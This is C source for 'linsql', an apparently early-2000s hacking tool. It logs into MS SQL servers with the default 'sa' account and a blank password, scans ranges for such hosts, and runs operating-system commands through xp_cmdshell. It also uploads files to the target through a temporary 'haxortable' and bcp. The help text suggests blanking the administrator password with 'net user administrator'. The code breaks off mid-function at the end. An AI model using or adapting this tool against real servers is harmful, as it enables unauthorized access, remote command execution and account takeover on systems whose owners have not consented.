/* * linsql.c * * A simple command-line client for MS SQL server. * Designed for executing commands on the underlying operating system rather than SQL engine. * That said, it has the ability to perform SQL queries on the server. * * Setup to login as the user 'sa' with no password by default, although this can be changed. * * Known bugs/issues: * - after queries that return no data, all further queries return data on the next query. Buggy TDS library. * - lots of redundant code, could be rewritten... fuck it. it works. * - lots of fixed-len arrays is asking for seg faults. Tell someone who cares. * - upload function works... most of the time. * - no checks on commandline args. Eg, "./linsql -a" seg faults due to missing args. * * To add: * - download function that works as an inverse of upload.... might require some extra code. Will see. * * To compile, first build the FreeTDS libraries available at http://www.freetds.org * then add the freeTDS lib path to /etc/ld.so.conf and execute ldconfig, then: * * gcc -o linsql linsql.c -ltds -lncurses * * To run, this should work for most hosts (note, -v is highly recommended): * * ./linsql -c -v -i IPADDRESS * * Written by Herbless - all ideas, code and bugs are mine. * * This version is old... I stupidly overwrote my current version with junk....DOH! never mind * */ #include "../freetds/include/tds.h" #include #include #include #include #include #include #include #include #define MAX_BUF_SIZE 256 #define MAX_NUM_DBS 128 #define MAX_INPUT_LEN 8192 // change this for a larger input buffer in interactive mode #define MAX_INPUT_LEN_UPPER_BOUNDS 50000000 // maximum ceiling available for input buffer is 50Megs. Enough ? #define CMD_PADDING 20 #define __PROMPT__ "linsql > " #define UPKEY -1 #define DOWNKEY -2 #define LEFTKEY -3 #define RIGHTKEY -4 #define BACKSPACE -5 #define MAX_COMMANDS 128 #define STATUS_FILE "__linsql__scanfile__temp__" /*********************************************************************************** * the structures we don't really need to use but do because they keep things tidy ***********************************************************************************/ struct { int verbose; int probe; int interactive; int username; int password; int app; int charset; int language; int hostname; int loginID; int test; int log; int scan; } opt; struct { char IP[MAX_BUF_SIZE]; char loginID[MAX_BUF_SIZE]; char password[MAX_BUF_SIZE]; char app[MAX_BUF_SIZE]; char hostname[MAX_BUF_SIZE]; char charset[MAX_BUF_SIZE]; char language[MAX_BUF_SIZE]; char logfile[MAX_BUF_SIZE]; } target; /*********************************************************************************** * declare the function prototypes ***********************************************************************************/ void set_target_defaults(); char *value_as_string(TDSSOCKET *tds,int col_idx); void display_help(); void get_input_string(char *input); void execute_query(char *query); void execute_query2(char *query); void display_db_list(); int do_local_command(char *buf); void display_table_list(); void print_it(char *s, ...); void display_options(); void upload_file(char *fname, char *path); void list_stored_procedures(); void list_columns_in_table(char *query); int get_key(); int get_string(char *buffer, int maxCount); void setup_terminal(); // always call this first void close_terminal(); // always call this before you exit() your program void scan_hosts(char *iprange,int cTimeout, int pTimeout); // scan for vulnerable hosts int probe_login(char *ip); /*********************************************************************************** * mmmm, luvvly global variables. it's an easy life.... ***********************************************************************************/ char *inputBuf, *execCmd,*backSpaceSequence, *cteol, *home, *commandBuf[MAX_COMMANDS]; int inputBufSize=MAX_INPUT_LEN,numCommands=0; TDSLOGIN *login; TDSSOCKET *tds; FILE *logfileFP; struct termios init_settings, new_settings; /*********************************************************************************** * the good old main() function ***********************************************************************************/ main(int argc,char **argv) { int i, invalidArg=0, currArg=1, exitFlag=0, maxx, maxy,x,y, timeout, probeTimeout; char *arg; /* * setup the default values */ memset((void *)&opt,0,sizeof(opt)); memset((void *)&target,0,sizeof(target)); /* * check to see if we were passed arguments. If not, display short help screen and bail out */ if(argc==1) { printf("linsql -- by Herbless -- July 2K\n"); printf("Syntax:\n"); printf("\t-i \t\tSpecify target IP\n\t-c\t\t\tCommand-line interactive mode\n"); printf("\t-v\t\t\tBe verbose (recommended)\n\t-p\t\t\tProbe for default password and exit.\n"); printf("\t-u \t\tSpecify username\n\t-P \t\tSpecify password\n\t-a \t\tGive application name\n"); printf("\t-C \t\tSpecify charset\n\t-l \t\tChoose language\n\t-h \t\tGive client hostname\n"); printf("\t-L \t\tLog all I/O to in append mode\n\t-s [ct] [pt]\tScan for vulnerable hosts\n"); printf("\t\t\t\tConnect timeout at [ct] seconds\n\t\t\t\tProbe timeout at [pt] seconds\n"); printf("\t-t\t\t\tTest mode. Used for debugging with no remote connection.\n\n"); exit(1); } /* * parse all the arguments passed from the shell */ argv++; while(*argv!=NULL&&invalidArg==0) { arg=*(argv++); if(arg[0]=='-') { switch(arg[1]) { case 'i': // get IP address arg=*(argv++); strncpy(target.IP,arg,MAX_BUF_SIZE); break; case 'p': // set probe mode opt.probe=1; break; case 'c': // set interactive mode opt.interactive=1; break; case 'v': // set the verbose mode opt.verbose=1; break; case 't': opt.test=1; break; case 'u': // change the login name (default 'sa') arg=*(argv++); strncpy(target.loginID,arg,MAX_BUF_SIZE); opt.username=1; break; case 'P': // specify a password (default is blank) arg=*(argv++); strncpy(target.password,arg,MAX_BUF_SIZE); opt.password=1; break; case 'a': // specify application to pretend to be arg=*(argv++); strncpy(target.app,arg,MAX_BUF_SIZE); opt.app=1; break; case 'C': // change character set (default us_english) arg=*(argv++); strncpy(target.charset,arg,MAX_BUF_SIZE); opt.charset=1; break; case 'l': // change language (default iso_1) arg=*(argv++); strncpy(target.language,arg,MAX_BUF_SIZE); opt.language=1; break; case 'h': // give client hostname (default mypc) arg=*(argv++); strncpy(target.hostname,arg,MAX_BUF_SIZE); opt.hostname=1; break; case 'L': // do we want logging turned on arg=*(argv++); strncpy(target.logfile,arg,MAX_BUF_SIZE); opt.log=1; break; case 's': if(argc < 3) printf("You must at least specify an IP address or IP range.\n"); arg=*(argv++); if(*argv!=NULL && **argv!='-') { timeout=atoi(*(argv++)); if(*argv!=NULL && **argv!='-') { probeTimeout=atoi(*(argv++)); } else probeTimeout=10; } else { timeout=4; probeTimeout=10; } strncpy(target.IP, arg,MAX_BUF_SIZE); opt.scan=1; break; default: // any other commandline args are invalid invalidArg=1; break; } } else invalidArg=1; currArg++; } /* * make sure all is OK with the passed arguments */ if(invalidArg) { printf("Invalid argument - '%s'\n", arg); exit(1); } if(target.IP[0]==0) { printf("If you want to connect you must give an IP!\n"); exit(1); } if(opt.probe&&opt.interactive) { printf("It makes no sense to probe in interactive mode. Choose only one.\n"); exit(1); } if(opt.log) { if((logfileFP=fopen(target.logfile,"wa"))==NULL) { printf("Could not write to logfile \"%s\"\n",target.logfile); exit(1); } } if(opt.probe==0&&opt.interactive==0) { opt.probe=1; if(opt.verbose) print_it("- No connect mode given. Assuming probe mode.\n"); } if(opt.verbose) display_options(); /* * setup the call to connect() */ set_target_defaults(); /* * display messages in verbose mode */ if(opt.verbose&&opt.probe) print_it("- Probing target [%s]...\n", target.IP); else if(opt.verbose&&opt.interactive) print_it("- Attempting interactive command-prompt mode with [%s]...\n",target.IP); /* * Attempt to login to server */ if(opt.scan==1) { print_it("Scanning %s with connect timeout=%d secs, probe timeout=%d secs.\n",arg, timeout, probeTimeout); scan_hosts(target.IP, timeout, probeTimeout); exit(0); } if(opt.test==0) if((tds = tds_connect(login))==NULL) { tds_free_login(login); if(opt.verbose) print_it("- Login to [%s] failed.\n", target.IP); exit(1); } /* * Success... we're logged into the SQL server. We can have our wicked way :) * * call this function to initialize my little keyboard routines */ setup_terminal(); if(opt.verbose) print_it("- Login to [%s] succeeded %s\n", target.IP,(opt.test==1)?"(TEST MODE)":""); else if(opt.probe) print_it("*** Login to [%s] succeeded %s ***\n", target.IP,(opt.test==1)?"(TEST MODE)":""); if(opt.interactive) { if(opt.verbose) print_it("- Entering interactive mode. Remember this isn't a shell.\n"); if((inputBuf=(char *)malloc(MAX_INPUT_LEN))==NULL) { print_it("Out of memory allocating input buffer\n"); exit(1); } if((execCmd=(char *)malloc(MAX_INPUT_LEN+CMD_PADDING))==NULL) { printf("Out of memory allocating command buffer with padding\n"); exit(1); } print_it("Type /h or /? for help\n"); while(exitFlag==0) { memset(inputBuf,0,MAX_INPUT_LEN); print_it(__PROMPT__); fflush(stdout); // needed, for prompt to be displayed without adding a cr/lf pair after it get_string(inputBuf,MAX_INPUT_LEN); // read command from keyboard if(inputBuf[0]=='/') // is it a local command ? exitFlag=do_local_command(inputBuf); else if(inputBuf[0]!='\0') // valid buffer ? { strcpy(execCmd, "xp_cmdshell '"); // cheap n cheerful way to build query string without escaping/formatting it strcat(execCmd, inputBuf); strcat(execCmd, "'"); if(opt.verbose) print_it("\nExecuting [%s]\n",execCmd); else print_it("\n"); execute_query(execCmd); } else printf("\n"); } } /* * tidy up and exit cleanly */ if(opt.verbose) print_it("- Tearing down the connection...\n"); if(opt.test==0) tds_free_socket(tds); tds_free_login(login); if(opt.verbose) { print_it("- Disconnected\n"); print_it("- Freeing dynamic memory...\n"); } free(execCmd); free(inputBuf); if(opt.verbose) print_it("- All done. Have a nice day!\n"); close_terminal(); exit(0); } /*********************************************************************************** * functions go here..... ***********************************************************************************/ /* * guess what this does */ void display_options() { print_it("- Using options:\n"); print_it("\tTarget IP: %s\n", target.IP); if(opt.probe) print_it("\tProbe mode\n"); if(opt.interactive) print_it("\tInteractive mode\n"); if(opt.username) print_it("\tUsername (login) \"%s\"\n",target.loginID); if(opt.password) print_it("\tPassword ******\n"); if(opt.hostname) print_it("\tHostname \"%s\"\n",target.hostname); if(opt.app) print_it("\tApplication name \"%s\"\n",target.app); if(opt.language) print_it("\tLanguage \"%s\"\n",target.language); if(opt.charset) print_it("\tCharset \"%s\"\n",target.charset); if(opt.log) print_it("\tLogging to file \"%s\"\n",target.logfile); if(opt.test) print_it("\tTest mode - no connect()\n"); } /* * duh, guess what this does */ void display_help() { print_it("\nlinsql -- by Herbless -- July 2K\n"); print_it("All local commands begin with a '/' character.\n\n"); print_it(" /? or /h - This guff\n"); print_it(" /s - Send COMMAND as a literal string to the SQL server.\n"); print_it(" Can be used to perform SELECT queries etc.\n"); print_it(" Eg. /s SELECT * FROM foo WHERE bar=\"boz\"\n"); print_it(" /u - Use DATABASE as the active database.\n"); print_it(" /d - Display a list of databases held on server\n"); print_it(" /t - Display a list of tables in current database\n"); print_it(" /v - Toggle verbose mode\n"); print_it(" /l - Toggle logging mode\n"); print_it(" /L - Change logfile to FILE\n"); print_it(" /o - Display current options\n"); print_it(" /a - Allocate BUFFERSIZE bytes for input buffer. %d is current size.\n", inputBufSize); print_it(" /U - Upload local FILE to remote DEST directory.\n"); print_it(" Eg. /U myfile.txt c:\\temp\n"); print_it(" /p - Print a list of the stored procdures on the server\n"); print_it(" /c - Display the columns in the given the table.\n"); print_it(" /q - Disconnect and quit\n\n"); print_it("Anything else will be passed to the 'xp_cmdshell' stored procedure and executed by the OS.\n"); print_it("So, you could issue a 'net user administrator \"\"' command for example.\n"); print_it("Note that you cannot use the ' character as it is the SQL query delimiter. Use \" instead.\n\n"); } /* * interpret and act upon '/' local commands */ int do_local_command(char *buf) { char *ptr, *fptr, *pptr, fname[MAX_BUF_SIZE], path[MAX_BUF_SIZE]; int exitFlag=0, newSize; if(buf[1]=='q') // bail out exitFlag=1; else if(buf[1]=='?'||buf[1]=='h') // display help display_help(); else if(buf[1]=='s') // execute a MS-SQL server command, not an operating system one { if(strlen(buf)>3) { strcpy(execCmd,buf+3); if(opt.verbose) print_it("\nExecuting [%s]\n",execCmd); execute_query(execCmd); } else print_it("\nYou must specify a command to execute!\n"); } else if(buf[1]=='d') // show databases display_db_list(); else if(buf[1]=='t') // show tables in database display_table_list(); else if(buf[1]=='l') // toggle logging on/off { opt.log=1-opt.log; if(opt.log) { if((logfileFP=fopen(target.logfile,"wa"))==NULL) { print_it("Failed to open the logfile \"%s\" in append mode.\n",target.logfile); opt.log=0; } } else fclose(logfileFP); print_it("Logging %s\n", (opt.log==1)?"on":"off"); } else if(buf[1]=='o') // show the current options { display_options(); } else if(buf[1]=='L') // change log file { if(opt.log) fclose(logfileFP); strncpy(target.logfile, buf+3, MAX_BUF_SIZE); opt.log=1; if((logfileFP=fopen(target.logfile,"wa"))==NULL) { print_it("Failed to open the logfile \"%s\" in append mode.\n",target.logfile); opt.log=0; } else print_it("Log file changed to \"%s\"\n",target.logfile); print_it("Logging %s\n", (opt.log==1)?"on":"off"); } else if(buf[1]=='u') // change current db { if(strlen(buf)>3) { strcpy(execCmd, "use "); strcat(execCmd,buf+3); if(opt.verbose) print_it("\nExecuting [%s]\n",execCmd); execute_query(execCmd); } else print_it("\nYou must specify database to make active!\n"); } else if(buf[1]=='v') // toggle verbose mode { opt.verbose=1-opt.verbose; print_it("\nVerbose mode %s\n",(opt.verbose==0)?"off":"on"); } else if(buf[1]=='a') // change size of allocated input buffer { if(strlen(buf)>3) { newSize=atoi(buf+3); if(newSize < 8192 || newSize > MAX_INPUT_LEN_UPPER_BOUNDS) print_it("The size %d is out of bounds.\nChoose a buffer between %d and %d bytes\n", newSize,MAX_INPUT_LEN,MAX_INPUT_LEN_UPPER_BOUNDS); else { inputBufSize=newSize; if((ptr=(char *)realloc(inputBuf, inputBufSize))==NULL) print_it("Not enough memory for that input buffer.\nKeeping original buffer size."); else { inputBuf=ptr; print_it("Allocated %d bytes for input buffer\n",inputBufSize); } if((ptr=(char *)realloc(execCmd, inputBufSize+CMD_PADDING))==NULL) { print_it("Not enough memory for the exec buffer.\nKeeping original buffer size."); inputBuf=(char *)realloc(inputBuf,MAX_INPUT_LEN); // if the execCmd buffer alloc fails, we have to realloc the inputBuf also } else { execCmd=ptr; print_it("Allocated %d bytes for exec buffer\n", inputBufSize+CMD_PADDING); } } } else print_it("You must specify a new size in bytes\n"); } else if(buf[1]=='U') { ptr=buf+2; if(*ptr!=' ') { print_it("Invalid upload\n"); return exitFlag; } fptr=fname; pptr=path; while(*ptr==' ') // skip blanks after '/U' ptr++; while(*ptr!=' '&&*ptr!='\0') // copy filename into buffer *(fptr++)=*(ptr++); if(*ptr!=' ') // make sure there is something after the filename { print_it("Invalid upload\n"); return exitFlag; } ptr++; while(*ptr!=' '&&*ptr!='\0') // copy path for dest file on remote server into buffer *(pptr++)=*(ptr++); *fptr='\0'; // null terminate the buffers *pptr='\0'; upload_file(fname, path); // upload it! remember the filename is local and may contain directoty parameters... } else if(buf[1]=='p') { list_stored_procedures(); } else if(buf[1]=='c') { if(strlen(buf)>3) { strcpy(execCmd, "sp_columns "); strcat(execCmd,buf+3); if(opt.verbose) print_it("\nExecuting [%s]\n",execCmd); list_columns_in_table(execCmd); } else print_it("\nYou must specify a table to to be able to list the columns\n"); } else print_it("\nOut of cheese error - redo from start.\n"); // invalid local command return exitFlag; } /* * send a prepared query to the MS SQL server * display all output nicely on the screen * gets messy with lines wider than the terminal width. to be fixed :) * the function is from the FreeTDS example code with some changes */ void execute_query(char *query) { int i, rowc=999,resultc=999, row, count=0, gotInside=0; if(opt.test==0) { //print_it("*** calling tds_submit_query() ***\n");fflush(stdout); if(tds_submit_query(tds,query)==TDS_FAIL) { if(opt.verbose) printf("TDS FAIL on tds_submit_query()\n"); return; } //print_it("*** Entering first loop ***\n"); while((resultc=tds_process_result_tokens(tds))==TDS_SUCCEED) { gotInside=1; //print_it("*** Entering second loop ***\n"); while((rowc=tds_process_row_tokens(tds))==TDS_SUCCEED) { for (i=0; ires_info->num_cols; i++) print_it("[%s] - %s\n", tds->res_info->columns[i]->column_name,value_as_string(tds, i)); count++; } } if(count==0) if(opt.verbose) print_it("resultc=%d, rowc=%d,gotInside=%d\n",resultc,rowc,gotInside); } } /* * use an 'sp_tables' stored procedure call to get a list of tables in the current database * will fail with unpredictable results if the procedure doesn't exist */ void display_table_list() { int i, resultc=999,rowc=999, row, count=0,gotInside=0; if(opt.test==0) { printf("\n"); if(tds_submit_query(tds,"sp_tables")==TDS_FAIL) { if(opt.verbose) printf("TDS FAIL on tds_submit_query()\n"); return; } while((resultc=tds_process_result_tokens(tds))==TDS_SUCCEED) { gotInside=1; while((rowc=tds_process_row_tokens(tds))==TDS_SUCCEED) { for(i=0; ires_info->num_cols; i++) if(strcmp(tds->res_info->columns[i]->column_name, "TABLE_NAME")==0) print_it("\n%s",value_as_string(tds, i)); count++; } } printf("\n\n"); } } /* * use an 'sp_databases' stored procedure call to get a list of databases from the server * will fail with unpredictable results if the procedure doesn't exist */ void display_db_list() { int i, resultc=999,rowc=999, row, count=0,gotInside=0; if(opt.test==0) { printf("\n"); if(tds_submit_query(tds,"sp_databases")==TDS_FAIL) { if(opt.verbose) printf("TDS FAIL on tds_submit_query()\n"); return; } while((resultc=tds_process_result_tokens(tds))==TDS_SUCCEED) { gotInside=1; while((rowc=tds_process_row_tokens(tds))==TDS_SUCCEED) { for(i=0; ires_info->num_cols; i++) if(strcmp(tds->res_info->columns[i]->column_name, "")==0||strcmp(tds->res_info->columns[i]->column_name, "DATABASE_NAME")==0) print_it("\n%s",value_as_string(tds, i)); count++; } } printf("\n\n"); } } /* * get a string and chop off the new-line added by the dumb-ass fgets(...) */ void get_input_string(char *input) { memset(input, 0, MAX_INPUT_LEN); fgets(input, MAX_INPUT_LEN-1,stdin); input[strlen(input)-1]='\0'; } /* * setup the initial values for the connection parameters * these may be changed by arguments on the commandline */ void set_target_defaults() { strncpy(target.loginID,"sa",MAX_BUF_SIZE); strncpy(target.password,"",MAX_BUF_SIZE); strncpy(target.language,"us_english",MAX_BUF_SIZE); strncpy(target.charset,"iso_1",MAX_BUF_SIZE); strncpy(target.hostname,"mypc",MAX_BUF_SIZE); strncpy(target.app,"Microsoft Access",MAX_BUF_SIZE); login = tds_alloc_login(); tds_set_passwd(login,target.password); tds_set_user(login,target.loginID); tds_set_app(login,target.app); tds_set_host(login,target.hostname); tds_set_library(login,"TDS-Library"); tds_set_charset(login,target.charset); tds_set_language(login,target.language); tds_set_server(login,target.IP); tds_set_packet(login,512); } /* * This function plucked straight from the FreeTDS example code * modified to display strings as the default value instead of an error message */ char *value_as_string(TDSSOCKET *tds,int col_idx) { static char result[256]; const int type = tds->res_info->columns[col_idx]->column_type; const char *row = tds->res_info->current_row; const int offset = tds->res_info->columns[col_idx]->column_offset; const void *value = (row+offset); switch(type) { case SYBVARCHAR: { strncpy(result, (char *)value, sizeof(result)-1); result[sizeof(result)-1] = '\0'; break; } case SYBINT4: { sprintf(result, "%d", *(int *)value); break; } default: { strncpy(result, (char *)value, sizeof(result)-1); result[sizeof(result)-1] = '\0'; //strcpy(result, "NotImp"); break; } } return result; } /* * print to screen and, if necessary, the log file */ void print_it(char *s, ...) { va_list ap; va_start(ap, s); vprintf(s, ap); if(opt.log&&logfileFP!=NULL) vfprintf(logfileFP,s,ap); va_end(ap); } void upload_file(char *fname, char *path) { FILE *fp; unsigned char *uploadBuf, buf[10], *ptr, *fptr; int start, end, size, verboseSave, i, ch; print_it("*** Beginning file upload ***\n"); /* * first, before I forget, strip out the directory path from the given filename so things don't get fucked up later. * at the end of the loop fptr will point to a bare filename. path will have any trailing slashes dropped */ size=strlen(fname); ptr=fname+size; while(size--) { if(*ptr=='/') { fptr=ptr+1; break; } ptr--; } if(size<=0) fptr=ptr; if(path[strlen(path)-1]=='\\') // chop any trailing slashes entered by dumb haxors ;) path[strlen(path)-1]='\0'; verboseSave=opt.verbose; opt.verbose=0; // stop execute_query() from shouting about what it's doing. makes things neater print_it("- opening file to upload...\n"); if((fp=fopen(fname,"r"))==NULL) { print_it("Cannot open \"%s\"\nUpload failed\n", fname); return; } start=ftell(fp); // should always be zero fseek(fp,0,SEEK_END); end=ftell(fp); // should be last byte of file. fseek(fp,0,SEEK_SET); size=end-start; // get size of file i=256+(size*2)+(CMD_PADDING*2); print_it("- allocating memory (%d bytes) for file of size %d bytes...\n",i, size); uploadBuf=(unsigned char *)malloc(i); // scrappy memory alloc should work in most cases :) if(uploadBuf==NULL) { printf("Not enough memory. Get a proper computer\nUpload failed\n"); fclose(fp); return; } print_it("- using master database\n"); execute_query("use master"); print_it("- dropping any old haxortable's\n"); execute_query("drop table haxortable"); print_it("- creating table \"haxortable\"\n"); execute_query("create table haxortable (upload image)"); print_it("- building query string to insert file into table...\n"); strcpy(uploadBuf, "insert into haxortable (upload) values(0x"); // start the query string i=0; ptr=uploadBuf+strlen(uploadBuf); do { if(fread(&ch,1,1,fp)) { // read byte from file sprintf(buf, "%2x", ch); // convert to hex pair if(buf[0]==' ') // make sure its a pair for single digits buf[0]='0'; *(ptr++)=buf[0]; // tag it on the end of the query string *(ptr++)=buf[1]; } }while(!feof(fp)); *(ptr++)=')'; *(ptr++)='\0'; // finish the query string fclose(fp); print_it("- insert the file into the temporary table...\n"); execute_query(uploadBuf); // stuff the file into the table print_it("- build a file for redirecting bcp commands");fflush(stdout); execute_query("xp_cmdshell 'echo.> c:\\temp\\bcp.cmd'");print_it(".");fflush(stdout); execute_query("xp_cmdshell 'echo 0 >> c:\\temp\\bcp.cmd'");print_it(".");fflush(stdout); execute_query("xp_cmdshell 'echo.>> c:\\temp\\bcp.cmd'");print_it(".");fflush(stdout); execute_query("xp_cmdshell 'echo.>> c:\\temp\\bcp.cmd'");print_it(".\n");fflush(stdout); print_it("- 'bcp' the file out of the database...\n"); sprintf(uploadBuf, "xp_cmdshell 'type c:\\temp\\bcp.cmd | bcp haxortable out %s\\%s -U %s -P %s > nul'",path,fptr,target.loginID,target.password); execute_query(uploadBuf); print_it("*** Wooha! File uploaded to server. Time to cleanup ***\n"); print_it("- removing bcp command file...\n"); execute_query("xp_cmdshell 'echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > c:\\temp\\bcp.cmd'"); // overwrite the file with junk execute_query("xp_cmdshell 'del c:\\temp\\bcp.cmd'"); print_it("- drop haxortable\n"); execute_query("drop table haxortable"); print_it("*** All done. \"%s\" should now be on the remote server in \"%s\" ***\n",fptr,path); free(uploadBuf); // remember to free the memory /* * this is a kludge, cos the tds_query routine fucks up with null return strings so we must reset the connection */ print_it("- Reconnecting as a kludge to fix broken TDS library...\n"); if(opt.test==0) tds_free_socket(tds); tds_free_login(login); login = tds_alloc_login(); tds_set_passwd(login,target.password); tds_set_user(login,target.loginID); tds_set_app(login,target.app); tds_set_host(login,target.hostname); tds_set_library(login,"TDS-Library"); tds_set_charset(login,target.charset); tds_set_language(login,target.language); tds_set_server(login,target.IP); tds_set_packet(login,512); if(opt.test==0) if((tds = tds_connect(login))==NULL) { tds_free_login(login); if(opt.verbose) print_it("- Reconnect to [%s] failed.\n", target.IP); exit(1); } print_it("- Kludge complete\n"); /* * end of kludge */ opt.verbose=verboseSave; } void list_stored_procedures() { int i, resultc=999,rowc=999, row, count=0,gotInside=0; if(opt.test==0) { printf("\n"); if(tds_submit_query(tds,"sp_help")==TDS_FAIL) { if(opt.verbose) printf("TDS FAIL on tds_submit_query()\n"); return; } while((resultc=tds_process_result_tokens(tds))==TDS_SUCCEED) { gotInside=1; while((rowc=tds_process_row_tokens(tds))==TDS_SUCCEED) { for(i=0; ires_info->num_cols; i++) if(strcmp(tds->res_info->columns[i]->column_name, "Name")==0) print_it("%s\n",value_as_string(tds, i)); count++; } } printf("\n"); } } void list_columns_in_table(char *query) { int i, resultc=999,rowc=999, row, count=0,gotInside=0; if(opt.test==0) { printf("\n"); if(tds_submit_query(tds,query)==TDS_FAIL) { if(opt.verbose) printf("TDS FAIL on tds_submit_query()\n"); return; } while((resultc=tds_process_result_tokens(tds))==TDS_SUCCEED) { gotInside=1; while((rowc=tds_process_row_tokens(tds))==TDS_SUCCEED) { for(i=0; ires_info->num_cols; i++) if(strcmp(tds->res_info->columns[i]->column_name, "COLUMN_NAME")==0) print_it("%s\n",value_as_string(tds, i)); count++; } } printf("\n"); } } void close_terminal() { tcsetattr(fileno(stdin),TCSANOW, &init_settings); while(numCommands--) free(commandBuf[numCommands]); } void setup_terminal() { setupterm(NULL, fileno(stdout), (int *)0); tcgetattr(fileno(stdin), &init_settings); new_settings=init_settings; new_settings.c_lflag &= ~ICANON; new_settings.c_lflag &= ~ECHO; new_settings.c_cc[VMIN]=1; new_settings.c_cc[VTIME]=0; tcsetattr(fileno(stdin),TCSANOW, &new_settings); backSpaceSequence=tigetstr("cub1"); cteol=tigetstr("dl1"); } int get_string(char *buffer, int maxCount) { int currChar=0,ch, cmdNum; cmdNum=numCommands; memset(buffer,0,maxCount); do { ch=get_key(); if(ch>0 &&ch!='\r'&&ch!='\n'&&isprint(ch)) { buffer[currChar++]=ch; printf("%c",ch); } else if(ch==UPKEY) { if(cmdNum) { putp(cteol); while(currChar--) { putp(backSpaceSequence); printf(" "); putp(backSpaceSequence); } memset(buffer,0,maxCount); cmdNum--; strcpy(buffer,commandBuf[cmdNum]); currChar=strlen(buffer); printf("%s",buffer); } } else if(ch==DOWNKEY) { if(cmdNum